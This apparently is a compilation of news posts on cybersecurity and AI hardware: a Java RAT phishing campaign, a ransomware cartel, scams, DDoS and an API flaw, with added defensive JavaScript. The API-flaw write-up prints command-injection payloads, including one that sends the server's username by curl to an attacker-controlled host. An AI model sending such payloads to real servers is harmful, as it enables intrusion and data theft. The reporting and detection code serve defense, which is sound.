
Cerebras Unveils World’s Fastest AI Chip, Beating Nvidia in Inference Speed

 

In a move that could redefine AI infrastructure, Cerebras Systems showcased its record-breaking Wafer Scale Engine (WSE) chip at Web Summit Vancouver, claiming it now holds the title of the world’s fastest AI inference engine. 

Roughly the size of a dinner plate, the latest WSE chip spans 8.5 inches (22 cm) per side and packs an astonishing 4 trillion transistors — a monumental leap from traditional processors like Intel’s Core i9 (33.5 billion transistors) or Apple’s M2 Max (67 billion). 

The result? A groundbreaking 2,500 tokens per second on Meta’s Llama 4 model, nearly 2.5 times faster than Nvidia’s recently announced benchmark of 1,000 tokens per second. “Inference is where speed matters the most,” said Naor Penso, Chief Information Security Officer at Cerebras. “Last week Nvidia hit 1,000 tokens per second — which is impressive — but today, we’ve surpassed that with 2,500 tokens per second.” 

Inference refers to how AI processes information to generate outputs like text, images, or decisions. Tokens, which can be words or characters, represent the basic units AI uses to interpret and respond. As AI agents take on more complex, multi-step tasks, inference speed becomes increasingly essential. “Agents need to break large tasks into dozens of sub-tasks and communicate between them quickly,” Penso explained. “Slow inference disrupts that entire flow.” 

What sets Cerebras apart isn’t just transistor count — it’s the chip’s design. Unlike Nvidia GPUs that require off-chip memory access, WSE integrates 44GB of high-speed RAM directly on-chip, ensuring ultra-fast data access and reduced latency. Independent benchmarks back Cerebras’ claims. 

Artificial Analysis, a third-party testing agency, confirmed the WSE achieved 2,522 tokens per second on Llama 4, outperforming Nvidia’s new Blackwell GPU (1,038 tokens/sec). “Cerebras is the only inference solution that currently outpaces Blackwell for Meta’s flagship model,” said Artificial Analysis CEO Micah Hill-Smith. 

While CPUs and GPUs have driven AI advancements for decades, Cerebras’ WSE represents a shift toward a new compute paradigm. “This isn’t x86 or ARM. It’s a new architecture designed to supercharge AI workloads,” said Julie Shin, Chief Marketing Officer at Cerebras.

Multiplatform Malware Campaign Uses PDF Invoices to Deploy Java-Based RAT

 

A new wave of cyberattacks is sweeping across digital infrastructures globally, leveraging weaponised PDF invoices to infiltrate systems with a sophisticated Java-based Remote Access Trojan (RAT). Security researchers from Fortinet have identified a multi-stage, evasive malware campaign targeting Windows, Linux, and macOS devices, exploiting the cross-platform capabilities of Java to establish remote control over compromised machines. 

The attack chain begins with phishing emails that appear to contain legitimate invoice attachments. These emails pass domain authentication checks—such as SPF validation—by misusing the serviciodecorreo.es mail service, which is permitted to send messages on behalf of numerous domains. The attached PDF lures recipients with urgent invoice-related messaging, prompting them to click embedded buttons that lead to the next stage of infection. 

Once a user interacts with the PDF, they are redirected to a Dropbox-hosted HTML file titled “Fattura”—the Italian word for “invoice.” This file prompts a basic CAPTCHA check before further redirecting the victim to a URL generated by Ngrok, a legitimate tunneling service often abused to conceal malicious activity. 

What makes this campaign particularly difficult to detect is its use of geolocation filtering. Depending on the user’s IP address, the final content differs: users located in Italy receive a Java Archive (JAR) file camouflaged under generic filenames such as “FA-43-03-2025.jar,” while users from other regions are shown an innocuous Google Drive document containing a non-malicious invoice from an entity named Medinova Health Group. This strategy effectively thwarts email security platforms that scan links from centralised cloud environments, which often lack region-specific browsing behaviour. 

If the user downloads and runs the JAR file, a Java-based Remote Access Trojan known as RATty is deployed. This malware allows attackers to execute remote commands, log keystrokes, capture screenshots, access files, and even control webcams and microphones. By exploiting the Java Runtime Environment (JRE), the RAT functions across operating systems, significantly broadening its potential victim base. To further evade detection, the campaign uses trusted platforms like Dropbox and MediaFire to host malicious components. Additionally, Ngrok’s dynamic tunneling service helps the attackers disguise their infrastructure, making attribution and blocking more difficult. 

The attackers have also conducted reconnaissance to identify vulnerable domains, optimising their strategy for maximum penetration and persistence. Security experts warn that the use of such multilayered and cross-platform infection techniques reflects the growing sophistication of threat actors. The campaign not only highlights the critical need for advanced threat detection systems but also reinforces the importance of user awareness, particularly around email-based social engineering tactics. 

Organisations are urged to ensure their endpoint protection tools are updated and to consider restricting the execution of Java applications from unknown sources. Furthermore, robust geofencing-aware email filtering and sandboxing solutions could help in flagging such targeted, region-specific attacks before they escalate.
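The chain described above (file-host HTML page, then a tunnel URL, then a JAR download) can be hunted for in web-proxy logs. The following is an added example, not code from Fortinet or from this post; the record shape, the host suffix lists and the 10-minute correlation window are assumptions, and the sample events are constructed.

```javascript
// Constructed proxy-log records (client, epoch seconds, URL); not real traffic.
const SAMPLE_EVENTS = [
  { client: '10.0.0.5', ts: 1000, url: 'https://www.dropbox.com/scl/fi/example/Fattura.html?dl=1' },
  { client: '10.0.0.5', ts: 1030, url: 'https://example-tunnel.ngrok-free.app/check' },
  { client: '10.0.0.5', ts: 1042, url: 'https://example-tunnel.ngrok-free.app/files/FA-43-03-2025.jar' },
  { client: '10.0.0.9', ts: 1100, url: 'https://www.dropbox.com/s/example/report.html' },
  { client: '10.0.0.9', ts: 5000, url: 'https://repo.example.org/lib/tool.jar' },
];

// Assumed suffix lists; maintain them from your own threat intelligence.
const FILE_HOSTS = ['dropbox.com', 'dropboxusercontent.com', 'mediafire.com'];
const TUNNEL_HOSTS = ['ngrok.io', 'ngrok.app', 'ngrok-free.app'];
const WINDOW_SECONDS = 600; // assumed correlation window between hops

// Exact host or true subdomain match, so "notdropbox.com" does not match.
function hostMatches(host, suffixes) {
  return suffixes.some((s) => host === s || host.endsWith('.' + s));
}

// Flag a .jar download that follows file-host HTML -> tunnel host for one client.
function findInvoiceChains(events) {
  const state = new Map(); // client -> timestamps of the earlier hops
  const alerts = [];
  const sorted = [...events].sort((a, b) => a.ts - b.ts);
  for (const ev of sorted) {
    let u;
    try { u = new URL(ev.url); } catch { continue; } // skip unparsable URLs
    const host = u.hostname.toLowerCase();
    const path = u.pathname.toLowerCase();
    const st = state.get(ev.client) || { fileHostTs: null, tunnelTs: null };
    const fresh = (t) => t !== null && ev.ts - t <= WINDOW_SECONDS;

    if (hostMatches(host, FILE_HOSTS) && path.endsWith('.html')) {
      st.fileHostTs = ev.ts; // hop 1: HTML lure on a file-sharing host
      st.tunnelTs = null;
    } else if (hostMatches(host, TUNNEL_HOSTS) && fresh(st.fileHostTs)) {
      st.tunnelTs = ev.ts;   // hop 2: tunnel URL shortly after the lure
    }
    if (path.endsWith('.jar') && fresh(st.tunnelTs)) {
      alerts.push({ client: ev.client, jarUrl: ev.url, ts: ev.ts }); // hop 3
      st.fileHostTs = null;
      st.tunnelTs = null;
    }
    state.set(ev.client, st);
  }
  return alerts;
}
```

Because the campaign serves the JAR only to some source addresses, this correlation is meant for logs of real user traffic rather than for a scanner's own fetch of the link.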

“They're Just People—But Dangerous Ones”: Trellix's John Fokker Unpacks the Blurred Battlefield of Cybercrime at RSA 2025

 

At the RSA Conference 2025, John Fokker, head of threat intelligence at the Trellix Advanced Research Center, issued a stark reminder to the cybersecurity community that behind every cyberattack is a human being and that the boundaries between criminals and nation-states are rapidly dissolving. Drawing from his experience as a former officer in the Dutch high-tech crime unit, Fokker urged cybersecurity professionals to stop viewing threats as faceless or purely technical. “Cybercriminals are not abstract concepts,” he said. “They’re individuals—ordinary people who happen to be doing bad things behind a keyboard.” 

His keynote speech stressed the importance of not overlooking basic vulnerabilities in the rush to guard against sophisticated attacks. “Attackers still go for the low-hanging fruit—weak passwords, missing patches, and lack of multi-factor authentication,” he noted. A central theme of his address was the convergence of criminal networks and state-backed operations. “What once were clearly separated entities—financially motivated hackers and state actors...are now intertwined,” Fokker said. “Nation-states are increasingly using proxies or outright criminals to carry out espionage and disruption campaigns.” Fokker illustrated this through a case study involving the notorious Black Basta ransomware group. 

He referenced internal communications that surfaced in an investigation, revealing the group’s leader, “Oleg,” formerly known as “Tramp” in the Conti gang. Oleg was reportedly arrested upon arriving in Armenia from Moscow last year, but escaped custody just days later. According to leaked chats, he claimed Russian officials orchestrated his return using a so-called “green corridor,” allegedly coordinated by a senior government figure referred to as “number one.” While Fokker clarified that these claims remain unverified, he emphasized they are a troubling sign of potential collaboration between state entities and criminal gangs. 

Still, he reminded attendees that attackers are not infallible. He recounted a failed ransomware attack by Black Basta on a U.S. healthcare organization, where the group’s encryption tool malfunctioned. “They had to fall back on threatening to leak data when the original extortion method broke down,” Fokker explained, highlighting that even seasoned attackers are prone to critical errors.

Security Researcher Uncovers Critical RCE Flaw in API Due to Incomplete Input Validation

In a recent security evaluation, a researcher discovered a severe remote code execution (RCE) vulnerability caused by improper backend input validation and misplaced reliance on frontend filters. The vulnerability centered on a username field within a target web application. 

On the surface, this field appeared to be protected by a regular expression filter—/^[a-zA-Z0-9]{1,20}$/—which was designed to accept only alphanumeric usernames up to 20 characters long. However, this filtering was enforced exclusively on the frontend via JavaScript. While this setup may prevent casual misuse through the user interface, it offered no protection once the client-side constraints were bypassed. 

The server did not replicate or enforce these restrictions, creating an opportunity for attackers to supply crafted payloads directly to the backend.

Client-Side Regex: A False Sense of Security

The researcher quickly identified a dangerous assumption built into the application’s architecture: that client-side validation would be sufficient to sanitize input. This approach led the backend to trust incoming data without question. 

By circumventing the web interface and manually crafting HTTP requests, the researcher was able to supply malicious input that would have been blocked by the frontend regex. This demonstrated a critical weakness in security design. The researcher noted that regular expressions should be viewed as tools to assist in user input formatting, not as security mechanisms. 

When frontend validation is treated as a safeguard rather than a convenience, it opens the door to serious vulnerabilities.

Bypassing Protections via Alternate HTTP Methods

The most significant discovery came when the researcher explored alternate HTTP methods. While the application interface relied on POST requests—where regex filters were enforced—the backend also accepted PUT requests at the same endpoint. These PUT requests were not subjected to any validation, creating a dangerous inconsistency. 

Using a crafted PUT request with the payload username=;id;, the researcher confirmed the ability to inject and execute arbitrary commands. The server’s response to the id command verified the successful exploitation of this oversight. Further probing revealed the potential for more advanced attacks, including out-of-band (OOB) data exfiltration. 

By submitting a payload like username=;curl http://attacker-controlled.com/$(whoami);, the researcher caused the server to initiate a connection to an external domain. This revealed the active user account running on the server, proving that the command had been executed remotely. The absence of a web application firewall (WAF) allowed this traffic to pass unnoticed, making the attack both silent and effective.

Architectural Oversight and Security Best Practices

This case highlighted a widespread architectural flaw: the fragmentation of security logic between frontend and backend layers. Developers frequently assume that if an input field is restricted on the client side, it is secure—overlooking the need to apply the same or stricter rules on the server. This disconnect is what enabled the exploit. 

The API processed data without verifying whether it adhered to expected formats, and alternative HTTP methods were insufficiently monitored or restricted. To address such risks, experts stress the importance of server-side validation as the primary line of defense. Every piece of input data should be rigorously checked against an allowlist of acceptable values before processing. 

Additionally, output should be sanitized to ensure that even if unsafe input slips through, it cannot be used maliciously. Logging and monitoring are also critical, especially for API endpoints that might be vulnerable to tampering. The deployment of a robust WAF could have detected and blocked these unusual request patterns, such as command injection or OOB callbacks, thereby mitigating the threat before damage occurred.
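One way to apply the server-side rule described above is sketched here as an added example; it is not the researcher's or the affected application's code. The handler name, the form-encoded body, the POST-only method allowlist and the helper arguments are assumptions, and it goes slightly beyond the write-up by also producing a log record for each refused request.

```javascript
// The regex the frontend applied, now enforced on the server.
const USERNAME_RE = /^[a-zA-Z0-9]{1,20}$/;
// Assumed: POST is the only method the interface needs; PUT and others are refused.
const ALLOWED_METHODS = new Set(['POST']);

// Build the response and a log record for a refused request. JSON.stringify
// escapes control characters, so supplied text cannot forge extra log lines.
function rejection(status, reason, method, value) {
  const log = JSON.stringify({ event: 'username_rejected', reason, method, value });
  return { status, body: reason, log };
}

// Read exactly one username from an application/x-www-form-urlencoded body.
function extractUsername(rawBody) {
  const values = new URLSearchParams(rawBody).getAll('username');
  // A missing or duplicated parameter is refused rather than guessed at.
  return values.length === 1 ? values[0] : null;
}

// One decision function for the endpoint: the same checks run whatever
// client or HTTP method delivered the request.
function handleUserUpdate(method, rawBody) {
  if (!ALLOWED_METHODS.has(method)) {
    return rejection(405, 'method not allowed', method, null);
  }
  const username = extractUsername(rawBody);
  if (username === null || !USERNAME_RE.test(username)) {
    return rejection(400, 'invalid username', method, username);
  }
  // If a helper program has to be run, hand it the value as a separate
  // argument (an argv array, as child_process.execFile takes), never as
  // part of a shell command string. '--user' is a hypothetical flag.
  return { status: 200, body: 'ok', argv: ['--user', username] };
}
```

In JavaScript, `$` without the `m` flag matches only at the very end of the input, so a value with a trailing newline is rejected as well.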

Bitdefender Warns of Surge in Subscription Scams Disguised as Online Stores and Mystery Boxes

 

Cybersecurity researchers at Bitdefender have uncovered a sharp increase in deceptive online subscription scams, with fraudsters disguising themselves as legitimate e-commerce platforms and mystery box vendors. These sophisticated schemes are luring unsuspecting users into handing over sensitive credit card details under the guise of low-cost purchases. 

Unlike older, more obvious fraud attempts, this new wave of scams involves meticulously crafted fake websites that mimic real online shops. Bitdefender’s investigation revealed over 200 fraudulent sites offering goods such as footwear, apparel, and electronic gadgets. 

The catch? Victims unknowingly agree to recurring subscription charges cleverly hidden in the fine print. One tactic gaining traction is the so-called “mystery box” scam. These scams entice consumers with a small upfront fee in exchange for a surprise package, often marketed as unclaimed luggage or packages left behind at airports or post offices. 
However, the real goal is to harvest personal and payment information, often enrolling victims in recurring payment plans before the transaction is even finalized. The scams are widely advertised on social media platforms, including Facebook, through sponsored posts. 

In many cases, scammers pose as content creators or use fake influencer pages to build trust. Bitdefender researchers found more than 140 websites pushing these scams, with many traced back to a recurring address in Limassol, Cyprus—an address also linked to entities named in the Paradise Papers by the ICIJ Offshore Leaks Database. 

Some websites go further, advertising discounted “member prices” that require account top-ups, like a charge of €44 every two weeks, often concealed in promotional offers. These scams frequently promote multiple membership levels, using store credits and promises of steep discounts to mask overpriced or outdated products. 

Bitdefender warns that the evolving nature of these scams—complete with high-quality websites, paid advertising, and fake brand endorsements—makes them harder to detect. With the profitability of subscription fraud rising, scammers are scaling their operations, expanding beyond mystery boxes into bogus product sales and investment offers. 

Researchers caution users to stay vigilant while shopping online, especially when prompted to enter payment information for deals that seem too good to be true. As these tactics grow more elaborate, consumers are urged to read the fine print and verify the authenticity of online shops before completing any transactions.

Massive 1Tbps DDoS Attack Cripples Online Betting Site, Exposes Industry’s Ongoing Cybersecurity Failures

 

An online betting company has been knocked offline by a colossal 1-terabit-per-second Distributed Denial of Service (DDoS) attack, exposing glaring weaknesses in the digital defences of the gambling industry. Reported by TechRadar, the attack unleashed a massive flood of junk traffic that overwhelmed the site’s infrastructure, rendering its services inaccessible for hours. 

What makes the incident more concerning is the lack of sophistication behind it—this wasn’t a complex, stealthy operation but rather a brute-force flood that succeeded purely through scale. Despite the growing prevalence of such attacks in recent years, many companies in high-risk sectors like online gambling continue to treat cybersecurity as an afterthought. 

With their operations heavily reliant on constant uptime and revenue tied to every second online, gambling platforms remain prime targets for attackers, yet many fail to invest in fundamental protections like cloud-based DDoS mitigation, real-time monitoring, and incident response planning. 

Cybersecurity experts are baffled by this ongoing negligence, especially when previous headline-grabbing attacks—such as the 1.3Tbps assault on GitHub in 2018 or AWS’s 2.3Tbps encounter in 2020—should have prompted serious change. 
Compounding the issue is the role of Internet Service Providers (ISPs), who continue to shy away from proactive upstream filtering, allowing these massive data floods to reach their targets unchecked. The financial impact of such downtime is severe, with potential losses not only in revenue but also in user trust, legal exposure, and long-term brand damage. 

Security professionals stress that effective DDoS defence requires more than just faith in hosting providers; it demands deliberate investment in scalable protection tools like AWS Shield, Cloudflare, or Akamai, along with robust infrastructure redundancy and tested incident response strategies. 

In 2025, DDoS attacks are no longer anomalies—they’re a constant threat woven into the fabric of the internet. Ignoring them is not cost-saving; it’s gambling with disaster.

DragonForce Unveils Cartel-Style Ransomware Model to Attract Affiliates

The ransomware landscape is seeing a shift as DragonForce, a known threat actor, introduces a new business model designed to bring various ransomware groups under a single, cartel-like umbrella. This initiative is aimed at simplifying operations for affiliates while expanding DragonForce’s reach in the cybercrime ecosystem. 

Traditionally, ransomware-as-a-service (RaaS) operations involve developers supplying the malicious tools and infrastructure, while affiliates carry out attacks and manage ransom negotiations. In exchange, developers typically receive up to 30% of the ransom collected. DragonForce’s updated model deviates from this approach by functioning more like a platform-as-a-service, offering its tools and infrastructure for a smaller cut—just 20%. 

Under this new setup, affiliates are allowed to create and operate under their own ransomware brand, all while utilizing DragonForce’s backend systems. These include data storage for exfiltrated files, tools for ransom negotiations, and malware deployment systems. This white-label model allows groups to appear as independent operations while relying on DragonForce’s infrastructure. 

A spokesperson for DragonForce told BleepingComputer that the group operates with clear rules and standards, which all affiliates are expected to follow. Any violations, they say, result in immediate removal from the network. Though these rules aren’t publicly disclosed, the group claims to maintain control since all services run on its servers. 

Interestingly, DragonForce claims it avoids certain targets in the healthcare sector, specifically facilities treating cancer and heart conditions. The group insists its motives are purely financial and not intended to harm vulnerable individuals. Cybersecurity analysts at Secureworks have noted that this new structure could appeal to both inexperienced and seasoned attackers. 

The simplified access to powerful ransomware tools, without the burden of managing infrastructure, lowers the barrier to entry and could lead to a broader adoption among cybercriminals. DragonForce has indicated its platform is open to unlimited affiliate brands capable of targeting a range of systems, including ESXi, NAS, BSD, and Windows environments. 

While the number of affiliates joining the network remains undisclosed, the group claims to have received interest from several prominent ransomware outfits. One such group, RansomBay, is already reported to be participating in the model. As this cartel-style operation gains traction, it could signal a new phase in ransomware operations—where brand diversity masks a centralised, shared infrastructure designed for profit and scalability.

Payment Fraud on the Rise: How Businesses Are Fighting Back with AI

The threat of payment fraud is growing rapidly, fueled by the widespread use of digital transactions and evolving cyber tactics. At its core, payment fraud refers to the unauthorized use of someone’s financial information to make illicit transactions. Criminals are increasingly leveraging hardware tools like skimmers and keystroke loggers, as well as malware, to extract sensitive data during legitimate transactions. 

As a result, companies are under mounting pressure to adopt more advanced fraud prevention systems. Credit and debit card fraud continue to dominate fraud cases globally. A recent report by Nilson found that global losses due to payment card fraud reached $33.83 billion in 2023, with nearly half of these losses affecting U.S. cardholders. 

While chip-enabled cards have reduced in-person fraud, online or card-not-present (CNP) fraud has surged. Debit card fraud often results in immediate financial damage to the victim, given its direct link to bank accounts. Meanwhile, mobile payments are vulnerable to tactics like SIM swapping and mobile malware, allowing attackers to hijack user accounts. 

Other methods include wire fraud, identity theft, chargeback fraud, and even check fraud—which, despite a decline in paper check usage, remains a threat through forged or altered checks. In one recent case, customers manipulated ATM systems to deposit fake checks and withdraw funds before detection, resulting in substantial bank losses. Additionally, criminals have turned to synthetic identity creation and AI-generated impersonations to carry out sophisticated schemes.  

However, artificial intelligence is not just a tool for fraudsters—it’s also a powerful ally for defense. Financial institutions are integrating AI into their fraud detection systems. Platforms like Visa Advanced Authorization and Mastercard Decision Intelligence use real-time analytics and machine learning to assess transaction risk and flag suspicious behavior. 

AI-driven firms such as Signifyd and Riskified help businesses prevent fraud by analyzing user behavior, transaction patterns, and device data. The consequences of payment fraud extend beyond financial loss. Businesses also suffer reputational harm, resource strain, and operational disruptions. 

With nearly 60% of companies reporting fraud-related losses exceeding $5 million in 2024, preventive action is crucial. From employee training and risk assessments to AI-powered tools and multi-layered security, organizations are now investing in proactive strategies to protect themselves and their customers from the rising tide of digital fraud.